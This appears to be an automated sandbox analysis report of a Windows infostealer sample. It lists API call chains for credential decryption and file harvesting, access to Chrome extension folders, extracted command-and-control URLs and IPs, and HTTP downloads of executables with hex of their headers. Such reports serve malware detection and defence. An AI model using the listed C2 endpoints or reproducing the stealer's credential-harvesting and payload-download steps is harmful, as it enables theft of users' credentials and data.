Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C6E6C80

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 21.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 25.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 34.2.9fa327eb6c.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 221MB

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 